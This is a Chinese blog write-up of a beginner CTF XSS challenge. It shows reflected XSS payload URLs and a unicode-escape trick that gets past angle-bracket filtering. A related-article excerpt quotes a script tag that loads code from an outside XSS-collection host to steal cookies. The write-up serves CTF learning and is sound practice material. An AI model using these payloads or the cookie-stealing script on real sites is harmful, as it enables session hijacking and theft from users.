CTF一些入门题目的wp(一)

最新推荐文章于 2024-06-07 11:58:48 发布
最新推荐文章于 2024-06-07 11:58:48 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: ctf

1. XSS注入测试 题目链接(http://103.238.227.13:10089)

        进入网页后发现


        由题目原先的提示得知注入点为id(GET方法),查看网页源代码,发现如下代码
 
        猜测应该是将s赋值为用户传上去的id的值
        innerHTML无法执行进来的script  可以构造img标签来使script执行
        测试一波:http://103.238.227.13:10089/?id=<%20img%20src=1%20οnlοad=alert(_key_)/>
        有回显 并没有成功,查看此时的源代码,发现<>被编码了 猜测应该是<>被过滤了
         考虑将<>进行unicode编码,这样当代码被替换进去运行时,utf-8编码又会将其变回来
        http://103.238.227.13:10089/?id=\u003c%20img%20src=1%20οnlοad=alert(_key_)/\u003e
        成功
        参考做法:https://blog.csdn.net/wy_97/article/details/77755098
        
Litchi_c
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初试ctf wp
c1042503039的博客
02-21 2177
初试ctf wp X-forwarded -for和reffer 根据提示,想到要请求真是的ip,于是我用burpsuite,拦截后到repeater,添加xff,这里遇到些问,到r后,必须先go,再去添加xff才能有正确的提示,经验吧积累。后面又试了又不是这样,纳闷。 看到“必须来自www.google.com”所以想到还要加referer flag就出现了 实验证明,xff可以不用大写,小...
CTF web wp
weixin_45694388的博客
10-11 1028
1.签到 火狐F12查看源码,发现注释: 一次base64解码出flag 2.Encode 在这里插入图片描述 和第一界面一样?? 轻车熟路f12: 发现编码: 格式看上去是base64,连续两次base64后,观察格式后发现是hex编码,解码出flag 3.Decoede me 一道php的加密 strrev(): 逆序 substr(): 返回字符串第0以后的1位ord():ord()函数返回字符串的首个字符的ASCII值。chr():从ascii表返回第_0以后的1位 ord(): or
LitCTF(MISC部分)
05-14
Litctf赛后wp(misc部分)
CTF——Crypto密码学型总结
热门推荐
hahaha233330的博客
10-26 2万+
积累一下 CTF 中 crypto 密码类的型。 感谢 BugKu 提供了很多加解密工具,链接:http://tool.bugku.com/ 感谢 SSL在线工具网址提供了很多工具,链接:http://www.ssleye.com/ 个人常用的 text bin hex base64 dec 转码工具:https://conv.darkbyte.ru/   1. 摩斯密码 特征:点和横的组合...
CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目
最新发布
jayq1的博客
06-07 1395
XSS
【web-ctfctf-pikachu-XSS
一个努力生活的人的博客
06-27 2426
XSS-pikachu
LitCTF2023 郑州轻工业大学首届网络安全赛 WP 部分
Aluxian_的博客
05-14 6720
由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。PS:记得所有的flag都改为NSSCTF或者LitCTF
Ctfshow web入门 XSS篇 web316-web333 详细解 全
Jay17的博客
09-28 4514
Ctfshow web入门 XSS篇 web316-web333 详细解 全
CTF入门到提升(一).docx
12-18
CTF入门到提升(一) CTF(Capture The Flag)是一种网络安全竞赛的形式,起源于西方传统运动,两军互相争夺旗帜,夺取敌军旗帜代表战败。在信息安全领域,CTF是通过各种攻击手法,获取服务器后寻找指定的字段,...
CTF竞赛MISC入门难度题目
10-01
主要是一些入门级别难度的杂项题目,配套培训视频效果更佳 涉及到的杂项型有:zip、rar、文件头修复、EXIF解析、gif逐帧解析、CRC校验、LSB隐写和音频 适合刚刚接触杂项的同学学习使用 网络安全杂项入门难度全套...
2022工业互联网大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto。分享给需要的朋友,如果有人能写出writeup的话,那就...
CTF取证类题目指南
01-09
取证作为CTF中的一大类题目,不完全包括安全产业中的实际工作,常见的与之相关的工作是事故相应。但即使在事故响应工作中,计算机取证也经常是执法部门获取证据数据和证物的工作,而非对防御攻击者或恢复系统感兴趣...
CTFer成长之路之XSS的魔力
吾所在处,即为净土
02-24 665
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
BUUCTF XSS-Lab
weixin_54438700的博客
07-21 914
alert("XSS")>level 1中的JS代码alert("XSS")level 1中的JS代码alert("XSS")
LitCTF2024 郑州轻工业大学首届网络安全赛 WP 部分_[litctf 2024]vim yyds
2401_84181221的博客
04-10 1221
由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。PS:记得所有的flag都改为NSSCTF或者LitCTF在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。
ctfhub-技能树-xss集全部习详解-最新
weixin_73562787的博客
08-10 3519
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
浅谈一个CTF中xss小案例
m0_68976043的博客
03-03 1289
X-XSS-Protection: 0:关闭XSS防护之后get传参,替换过滤为空,通过过滤保护输出到img src里面三、正常去做无法通过因为这道出的不严谨所以反引号也是可以绕过的正常考察我们的点不在这里,正常考察的是字符串解码两次编码也是无法绕过的因为&已经给我们防止住了没过滤百分号那我们是不是可以urlcode编码,但是在按下回车的那一下,我们网页自动就给我们又转回来了,等进入程序后又被过滤了那转码我们控制不了,我们可不可以添加一个%25很明显还是不行。
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5448
** [第二章 web进阶]XSS闯关 ** 一、解思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我
ctf 安卓 入门题目
11-02
CTF(Capture The Flag)安卓入门题目是为了帮助初学者理解和学习安卓应用程序的安全漏洞和攻防技术而设计的一系列题目。这些题目往往包含了一些常见的安卓漏洞,例如代码注入、权限绕过、数据泄露等等。 解决CTF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值